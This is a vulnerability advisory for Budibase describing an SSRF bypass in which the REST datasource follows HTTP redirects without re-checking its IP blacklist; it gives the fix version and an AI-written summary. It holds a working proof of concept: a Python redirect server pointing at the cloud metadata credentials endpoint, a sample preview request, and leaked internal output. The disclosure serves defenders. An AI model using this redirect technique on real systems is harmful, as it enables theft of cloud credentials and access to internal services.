Budibase: SSRF Bypass via HTTP Redirect in REST Datasource Integration
Description
Summary
The REST datasource integration follows HTTP redirects without re-checking the IP blacklist, allowing an authenticated Builder to access internal services (cloud metadata, databases) by redirecting through an attacker-controlled server. The same vulnerability class was already patched in automation steps (fetchWithBlacklist in packages/server/src/automations/steps/utils.ts) but the REST integration was missed.
Details
Vulnerable file: packages/server/src/integrations/rest.ts, lines 754-778
The _req() method checks the request URL against the IP blacklist at line 754, then calls fetch(url, input) at line 778. No redirect: "manual" option is set, so undici's fetch defaults to redirect: "follow", automatically following HTTP 301/302/307 redirects without re-validating the redirect target against the blacklist.
// Line 754 — blacklist check on original URL only
if (await blacklist.isBlacklisted(url)) {
throw new Error("URL is blocked or could not be resolved safely.")
}
// Line 778 — fetch follows redirects, NO re-check on redirect target
response = await fetch(url, input)
The automation steps already implement the correct fix in packages/server/src/automations/steps/utils.ts (lines 100-136) via fetchWithBlacklist(), which sets redirect: "manual" and re-checks the blacklist on every redirect hop. The REST integration does not use this safe wrapper.
Relevant prior fix commits on the automation side: - 6cfa3bcca3 — "fix(server): enforce outbound blacklist in webhook automation steps" - e7d47625be — "Fix automation webhook blacklist redirect bypass"
PoC
Step 1 — Set up a redirect server (attacker-controlled):
from http.server import HTTPServer, BaseHTTPRequestHandler
class RedirectHandler(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(302)
self.send_header('Location', 'http://169.254.169.254/latest/meta-data/iam/security-credentials/')
self.end_headers()
HTTPServer(('0.0.0.0', 8080), RedirectHandler).serve_forever()
Step 2 — As a Builder, create a REST datasource pointing to the attacker's server.
Step 3 — Preview a query:
POST /api/queries/preview HTTP/1.1
Host:
Content-Type: application/json
Cookie:
x-budibase-app-id:
{
"datasourceId": "",
"queryVerb": "read",
"fields": {
"path": "http://:8080/",
"queryString": "",
"headers": {},
"bodyType": "none",
"requestBody": ""
},
"parameters": [],
"transformer": "return data",
"name": "ssrf-test",
"schema": {}
}
Step 4 — The blacklist check passes (attacker IP is public), undici follows the 302 redirect to the internal target, and the response is returned:
{
"rows": [{
"couchdb": "Welcome",
"version": "3.3.3",
"uuid": "a84d3353128485a22973a759df2387bc"
}]
}
Tested and confirmed on Budibase v3.34.6 running locally with default blacklist active.
Impact
- Cloud credential theft: On AWS/GCP/Azure instances, attacker accesses
169.254.169.254to steal IAM credentials or service account tokens. - Internal service access: CouchDB (
:4005), Redis (:6379), MinIO (:4004), and other internal services become accessible - Bypasses explicit security control: The IP blacklist exists specifically to prevent this, and works correctly for direct access — only the redirect path is unprotected.
- Already-known vulnerability class: This was previously identified and fixed in automation steps (commits
6cfa3bcca3,e7d47625be) but the REST datasource integration was not patched.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
The Budibase REST datasource integration follows HTTP redirects without re-checking the IP blacklist, enabling SSRF via attacker-controlled redirect.
Vulnerability
The REST datasource integration in Budibase fails to re-validate the IP blacklist when following HTTP redirects. The vulnerable code resides in packages/server/src/integrations/rest.ts at lines 754–778. The _req() method checks the request URL against the IP blacklist at line 754, but then calls fetch(url, input) at line 778 without setting redirect: "manual". This causes undici's fetch to automatically follow HTTP 301, 302, or 307 redirects without re-checking the redirect target against the blacklist [1][2][3]. Affected versions include all Budibase versions prior to 3.38.1 [4].
Exploitation
An authenticated user with Builder-level privileges can exploit this by creating a REST datasource that points to an attacker-controlled HTTP server. The attacker's server responds with a redirect (e.g., 302) to an internal service URL, such as a cloud metadata endpoint (e.g., http://169.254.169.254/latest/meta-data/iam/security-credentials/). The Budibase server follows the redirect without re-checking the target against the blacklist, thus bypassing the intended restriction [1][2][3].
Impact
Successful exploitation allows the attacker to perform Server-Side Request Forgery (SSRF) against internal services. The attacker can access cloud metadata, internal databases, or other services within the server's network, potentially leading to information disclosure or further compromise of the internal infrastructure [1][2][3]. The attack is limited to authenticated users with Builder roles, but the scope of impact depends on the internal network's configuration.
Mitigation
The vulnerability is fixed in Budibase version 3.38.1, released on 2026-05-15 [4]. The fix, listed as "[Security] Harden REST datasource redirect handling" [4], applies the same fetchWithBlacklist() pattern already used in the automation steps (packages/server/src/automations/steps/utils.ts) to the REST integration, ensuring the blacklist is re-checked on every redirect hop [2][3]. Users should upgrade to version 3.38.1 or later. No workaround other than upgrading is documented in the available references.
AI Insight generated on May 21, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
1Patches
0No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
3News mentions
0No linked articles in our index yet.